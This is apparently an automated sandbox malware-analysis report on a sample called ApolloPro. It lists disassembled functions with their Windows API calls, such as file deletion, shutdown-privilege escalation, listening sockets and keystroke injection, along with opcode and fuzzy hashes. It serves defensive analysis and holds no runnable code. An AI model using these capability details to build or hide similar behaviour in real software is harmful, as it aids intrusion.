                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00693D96
                                                                                              • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00693E3E
                                                                                              • MoveFileW.KERNEL32(?,?), ref: 00693E51
                                                                                              • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00693E6E
                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00693E90
                                                                                              • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00693EAC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                                              • String ID: \*.*
                                                                                              • API String ID: 4002782344-1173974218
                                                                                              • Opcode ID: 6e5d2b3e7ded324dcf065da321d0bb6ccff963f9e3303341bedb24bd3e014114
                                                                                              • Instruction ID: b24b9c13687896c054c8445316ac7bd36ca3aee7c68256c19217ba7ea52f2a3a
                                                                                              • Opcode Fuzzy Hash: 6e5d2b3e7ded324dcf065da321d0bb6ccff963f9e3303341bedb24bd3e014114
                                                                                              • Instruction Fuzzy Hash: 1751603180115DAACF55EBA0D992DEEB77BAF12301F200169E442BB291EF356F49CB64
                                                                                              Function 0069FA36 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00641A36: _memmove.LIBCMT ref: 00641A77
                                                                                              • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0069FA83
                                                                                              • FindClose.KERNEL32(00000000), ref: 0069FB96
                                                                                                • Part of subcall function 006352B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 006352E6
                                                                                              • Sleep.KERNEL32(0000000A), ref: 0069FAB3
                                                                                              • _wcscmp.LIBCMT ref: 0069FAC7
                                                                                              • _wcscmp.LIBCMT ref: 0069FAE2
                                                                                              • FindNextFileW.KERNEL32(?,?), ref: 0069FB80
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$File_wcscmp$CloseFirstMessageNextPeekSleep_memmove
                                                                                              • String ID: *.*
                                                                                              • API String ID: 2185952417-438819550
                                                                                              • Opcode ID: 7f0f77160417ce5b0c6c2e7d7db392f3f53093ca6d489960c70f066328c4419f
                                                                                              • Instruction ID: adc13e01c3fc518325ceace902a1ec7f8e2342532d57ea91eba920aefdccc50d
                                                                                              • Opcode Fuzzy Hash: 7f0f77160417ce5b0c6c2e7d7db392f3f53093ca6d489960c70f066328c4419f
                                                                                              • Instruction Fuzzy Hash: 3441A17190021AAFDF54DF64CC59AEEBBBAFF05354F14416AE814E7690EB309E84CB90
                                                                                              Function 00694005 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00650284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00642A58,?,00008000), ref: 006502A4
                                                                                                • Part of subcall function 00694FEC: GetFileAttributesW.KERNEL32(?,00693BFE), ref: 00694FED
                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0069407C
                                                                                              • DeleteFileW.KERNEL32(?,?,?,?), ref: 006940CC
                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 006940DD
                                                                                              • FindClose.KERNEL32(00000000), ref: 006940F4
                                                                                              • FindClose.KERNEL32(00000000), ref: 006940FD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                              • String ID: \*.*
                                                                                              • API String ID: 2649000838-1173974218
                                                                                              • Opcode ID: 6854fc7ecd9ef9d09c4ed7d616c11815ca0cea91786161f01b5b5cae4109ed2d
                                                                                              • Instruction ID: a8cce21f0450c4391a601195d8672529255ea9e47d9bb7475f6678d9cd80fc70
                                                                                              • Opcode Fuzzy Hash: 6854fc7ecd9ef9d09c4ed7d616c11815ca0cea91786161f01b5b5cae4109ed2d
                                                                                              • Instruction Fuzzy Hash: B63181310093859BC740EB60D895CEFB7AEBE92304F440A1DF5E183291EF25DA4AC767
                                                                                              Function 00695778 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00689399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 006893E3
                                                                                                • Part of subcall function 00689399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00689410
                                                                                                • Part of subcall function 00689399: GetLastError.KERNEL32 ref: 0068941D
                                                                                              • ExitWindowsEx.USER32(?,00000000), ref: 006957B4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                              • String ID: $@$SeShutdownPrivilege
                                                                                              • API String ID: 2234035333-194228
                                                                                              • Opcode ID: b907e4f76a00c13f2fb21a1348981f17ef40b2b80d87c8b9761a7bab4673d714
                                                                                              • Instruction ID: a3cffcf4d02095b5ad11cafa299dca5f26cbd9e21aa091e6a5131e5501b4d57e
                                                                                              • Opcode Fuzzy Hash: b907e4f76a00c13f2fb21a1348981f17ef40b2b80d87c8b9761a7bab4673d714
                                                                                              • Instruction Fuzzy Hash: 3C01D431650712EAEF6962E49C8AFFB725EAB04750F140529F817DAAE2DA505D048364
                                                                                              Function 006A696E Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 006A69C7
                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 006A69D6
                                                                                              • bind.WSOCK32(00000000,?,00000010), ref: 006A69F2
                                                                                              • listen.WSOCK32(00000000,00000005), ref: 006A6A01
                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 006A6A1B
                                                                                              • closesocket.WSOCK32(00000000,00000000), ref: 006A6A2F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                              • String ID:
                                                                                              • API String ID: 1279440585-0
                                                                                              • Opcode ID: 114026140970e9dfba602efa336b36c9552398d038d803f2a285a1a9e83b8e1f
                                                                                              • Instruction ID: a16c0a540fc8ed2527cac7db0a49c6dbd83595acb8527bd2d619fbe41ee22dd0
                                                                                              • Opcode Fuzzy Hash: 114026140970e9dfba602efa336b36c9552398d038d803f2a285a1a9e83b8e1f
                                                                                              • Instruction Fuzzy Hash: 3821CE346006019FDB00FF68C889E6EB7AAEF45724F18815CF956A7391CB70AC01CFA0
                                                                                              Function 00631663 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 006329E2: GetWindowLongW.USER32(?,000000EB), ref: 006329F3
                                                                                              • DefDlgProcW.USER32(?,?,?,?,?), ref: 00631DD6
                                                                                              • GetSysColor.USER32(0000000F), ref: 00631E2A
                                                                                              • SetBkColor.GDI32(?,00000000), ref: 00631E3D
                                                                                                • Part of subcall function 0063166C: DefDlgProcW.USER32(?,00000020,?), ref: 006316B4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: ColorProc$LongWindow
                                                                                              • String ID:
                                                                                              • API String ID: 3744519093-0
                                                                                              • Opcode ID: fe14833c209d5809e81b2621ed6971ca860fce43af7ebdcd0f19a7ac099a3b6d
                                                                                              • Instruction ID: acb07a13020079d5297a99bb2ae49fc3256e408c36eef904bea3db97631e525e
                                                                                              • Opcode Fuzzy Hash: fe14833c209d5809e81b2621ed6971ca860fce43af7ebdcd0f19a7ac099a3b6d
                                                                                              • Instruction Fuzzy Hash: 54A114B0115404FAE728AB698C49EFB299FDF43311F14211EF442DE291CB259E82D6FA
                                                                                              Function 0069C2FF Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0069C329
                                                                                              • _wcscmp.LIBCMT ref: 0069C359
                                                                                              • _wcscmp.LIBCMT ref: 0069C36E
                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 0069C37F
                                                                                              • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0069C3AF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                              • String ID:
                                                                                              • API String ID: 2387731787-0
                                                                                              • Opcode ID: b1cc19a23fd3364e8dc9ba10835bd6b9887fa1bb947031a3e009ada59e715409
                                                                                              • Instruction ID: c9895d5aa01fe403fbfd2e20ba154fc16824822ef1a12e5445c60481420b169d
                                                                                              • Opcode Fuzzy Hash: b1cc19a23fd3364e8dc9ba10835bd6b9887fa1bb947031a3e009ada59e715409
                                                                                              • Instruction Fuzzy Hash: 1951AA35A046028FDB14DF68D490EAAB3EAEF49320F10461DE95ACB7A1DB30ED05CB91
                                                                                              Function 006A6E32 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 006A8475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 006A84A0
                                                                                              • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 006A6E89
                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 006A6EB2
                                                                                              • bind.WSOCK32(00000000,?,00000010), ref: 006A6EEB
                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 006A6EF8
                                                                                              • closesocket.WSOCK32(00000000,00000000), ref: 006A6F0C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                                              • String ID:
                                                                                              • API String ID: 99427753-0
                                                                                              • Opcode ID: a1420d2e0f01d591b3b065549bd90ea70b990a1ef2e1570e5cf4bd3bd15e8fa7
                                                                                              • Instruction ID: 7c0de60f16ede4cc1055f9efa0a017ad0c2e0cd0bd4c3ec64795af395fc2673f
                                                                                              • Opcode Fuzzy Hash: a1420d2e0f01d591b3b065549bd90ea70b990a1ef2e1570e5cf4bd3bd15e8fa7
                                                                                              • Instruction Fuzzy Hash: 2941B175600200AFEB50BF64DC86F7EB7AAAF45714F04855CF945AB3D2DA70AD008BE5
                                                                                              Function 006B59B3 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                              • String ID:
                                                                                              • API String ID: 292994002-0
                                                                                              • Opcode ID: 17fd68ce97e9fa424a99efcd12db1eb5adadb874725c140dd9b46d9c01ca9627
                                                                                              • Instruction ID: d8c32a8416fc9c77e1562cc3e04128144d82035cf2cf6c45d4c70e07af03fdcb
                                                                                              • Opcode Fuzzy Hash: 17fd68ce97e9fa424a99efcd12db1eb5adadb874725c140dd9b46d9c01ca9627
                                                                                              • Instruction Fuzzy Hash: 2111B6B2700911ABE7216F269C84BEAB79BEF44720F044129F847E7241CA30ED418BE4
                                                                                              Function 00670030 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: LocalTime__swprintf
                                                                                              • String ID: %.3d$WIN_XPe
                                                                                              • API String ID: 2070861257-2409531811
                                                                                              • Opcode ID: bf31014f29401f9669aab91c16a10eddf11dce3f45ffc0bbcdefd62e9dd1234f
                                                                                              • Instruction ID: 33862694416f20f937b6a73aa16cfe80439aa1f6165fa54d0ce07687ecb93f2d
                                                                                              • Opcode Fuzzy Hash: bf31014f29401f9669aab91c16a10eddf11dce3f45ffc0bbcdefd62e9dd1234f
                                                                                              • Instruction Fuzzy Hash: 2DD05BB1C14219EAD719DB90CC44DFA737EEB04315F208052F50AE2040D335878DEB36
                                                                                              Function 006A29BA Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,006A1ED6,00000000), ref: 006A2AAD
                                                                                              • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 006A2AE4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Internet$AvailableDataFileQueryRead
                                                                                              • String ID:
                                                                                              • API String ID: 599397726-0
                                                                                              • Opcode ID: 1630ecca9ef2f3171eb81bb763a245d2b5cab4b42d03bc1a14352a72fcfed028
                                                                                              • Instruction ID: 7bd763bf354e27f732b56f2872dec8305413be0b7652da1645fbb51d87a06e57
                                                                                              • Opcode Fuzzy Hash: 1630ecca9ef2f3171eb81bb763a245d2b5cab4b42d03bc1a14352a72fcfed028
                                                                                              • Instruction Fuzzy Hash: AE41F77164020AFFEB20EE98CC91EBBB7BEEB41714F10405EF601A7241DA70AE419E60
                                                                                              Function 00689399 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00650FE6: std::exception::exception.LIBCMT ref: 0065101C
                                                                                                • Part of subcall function 00650FE6: __CxxThrowException@8.LIBCMT ref: 00651031
                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 006893E3
                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00689410
                                                                                              • GetLastError.KERNEL32 ref: 0068941D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                              • String ID:
                                                                                              • API String ID: 1922334811-0
                                                                                              • Opcode ID: 5c5824ce874b42d0003f44373f42a3597868027edd1d616000dddac9d776665a
                                                                                              • Instruction ID: f0a443c418e965a033e5fe1b12336763d886a1e6b51e40ca622d4e9665533112
                                                                                              • Opcode Fuzzy Hash: 5c5824ce874b42d0003f44373f42a3597868027edd1d616000dddac9d776665a
                                                                                              • Instruction Fuzzy Hash: 8411BFB1414205AFE728EF54DC85D3BB7FEEB48311B24862EE84983240EB70AC41CB60
                                                                                              Function 00694254 Relevance: 4.6, APIs: 3, Instructions: 59fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00694271
                                                                                              • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 006942B2
                                                                                              • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 006942BD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseControlCreateDeviceFileHandle
                                                                                              • String ID:
                                                                                              • API String ID: 33631002-0
                                                                                              • Opcode ID: 700540cd1447ac4510af49c21e3fb423f4e3d27d2d9cd657dea7f0eef94e5923
                                                                                              • Instruction ID: af30be93fb8e2dc8693552565189dbf409775fa270e1bd8d0d3db8fb9e1d527d
                                                                                              • Opcode Fuzzy Hash: 700540cd1447ac4510af49c21e3fb423f4e3d27d2d9cd657dea7f0eef94e5923
                                                                                              • Instruction Fuzzy Hash: 74113C75E01228BBEB108FA5AC44FBFBBBDEB45B60F104166FD04E7390C6705A018BA1
                                                                                              Function 00694F1C Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00694F45
                                                                                              • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00694F5C
                                                                                              • FreeSid.ADVAPI32(?), ref: 00694F6C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                              • String ID:
                                                                                              • API String ID: 3429775523-0
                                                                                              • Opcode ID: 51e5e3769d40ee09d31b23e26a4f62f67bbeb0082f54ce5f51c643c89d0a149d
                                                                                              • Instruction ID: 94c87f1809b9cd415ee76ccd9b1ce2645f171763ad7424896954e31f3ab6b013
                                                                                              • Opcode Fuzzy Hash: 51e5e3769d40ee09d31b23e26a4f62f67bbeb0082f54ce5f51c643c89d0a149d
                                                                                              • Instruction Fuzzy Hash: 4CF03775A1120DFFEF04DFE09C89EBEBBBDEB08201F0044A9A901E2680E6346A448B50
                                                                                              Function 00691AC6 Relevance: 3.0, APIs: 2, Instructions: 32keyboardCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00691B01
                                                                                              • keybd_event.USER32(?,7694C0D0,?,00000000), ref: 00691B14
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: InputSendkeybd_event
                                                                                              • String ID:
                                                                                              • API String ID: 3536248340-0
